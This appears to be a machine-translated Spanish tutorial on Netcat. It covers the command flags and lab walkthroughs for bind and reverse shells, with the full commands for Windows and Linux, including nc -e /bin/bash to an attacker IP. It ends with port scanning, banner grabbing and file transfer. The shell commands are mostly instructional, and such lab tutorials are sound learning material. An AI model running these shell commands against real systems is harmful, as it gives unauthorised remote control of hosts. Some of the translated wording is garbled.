Concha de rebote Netcat
Netcat, NC para abreviar, es una herramienta de red simple y confiable, conocida como la navaja suiza de la industria de redes. A través de NC, puede realizar operaciones como escaneo de puertos, shell inverso, monitoreo de puertos y transferencia de archivos. Los parámetros comunes son los siguientes:
parámetro | efecto |
---|---|
-C | Especifica el comando de shell para ejecutar después de conectarse |
-mi | Especifica el nombre del archivo que se ejecutará después de la conexión. |
-k | Configure el Socket para mantenerse vivo (puede usar este parámetro si no desea desconectar el oyente después de salir del Shell) |
-l | modo monitor |
-pag | Establecer el puerto de comunicación utilizado por el host local |
-tu | Utilice el protocolo de transporte UDP, el valor predeterminado es TCP |
-v | Muestre el proceso de ejecución de la instrucción, use -vv para ser más detallado |
1. Carcasa de rebote positivo
topología experimental
Nombre de la máquina | IP |
---|---|
máquina de ataque | 192.168.41.20 |
servidor | 192.168.41.130 |
Introducción al experimento
La máquina atacante 192.168.41.20 y el servidor 192.168.41.130 pueden acceder entre sí, en este momento puede usar el shell de reenvío
Reproducción experimental
1) Ejecutar en el servidor:
#windows机器
nc64.exe -lvvp 1111 -e C:\Windows\System32\cmd.exe
#linux机器
nc -lvvp 1111 -e /bin/bash
2) Ejecutar en el avión de ataque
nc64.exe 192.168.41.130 1111
3) Obtener la capa positiva
2. Carcasa de rebote inverso
topología experimental
Nombre de la máquina | IP |
---|---|
máquina de ataque | 192.168.41.20 |
servidor | 192.168.41.130 |
Introducción al experimento
La máquina del atacante 192.168.41.20 no puede acceder directamente al servidor, pero el servidor 192.168.41.130 puede acceder a la máquina del atacante. En este momento, se puede usar un shell inverso
Reproducción experimental
1) Ejecutar en la máquina atacante
#监听1111端口
nc64.exe -lvvp 1111
2) ejecutar en el servidor (rebote a la máquina de ataque)
#windos机器
nc64.exe -e C:\Windows\System32\cmd.exe 192.168.41.20 1111
#linux机器
nc -e /bin/bash 192.168.41.20 1111
3) El atacante obtiene el caparazón inverso
3. Otros usos de Netcat
Captura de pancartas
La máquina de destino está ejecutando el servicio ssh, puede ver la versión del servicio
nc64.exe -nv IP Port
detección de puertos
Puede verificar la apertura del puerto y puede ver que el puerto 80 de nuestro servidor de destino no está abierto
nc64.exe -v IP Port
escaneo multipuerto
Puede verificar si varios puertos están abiertos y servicios permitidos
nc -v -z IP Port[1]-Port[65535]
puerto de escucha
Puerto de escucha, cuando se accede al puerto, se emitirá la información
nc64.exe -l -p Port
transferencia de archivos
máquina | IP |
---|---|
Receptor | 192.168.41.132 |
remitente | 192.168.41.20 |
La carpeta del receptor está vacía.
El receptor ejecuta el comando.
nc -lp Port > file
El remitente ejecuta el comando.
nc -vn IP Port < file -w 1
El receptor recibe el archivo
charla fácil
ejecución de aviones de ataque
nc -l -p Port
ejecución del servidor
nc64.exe -vn IP Port
El atacante recibe chat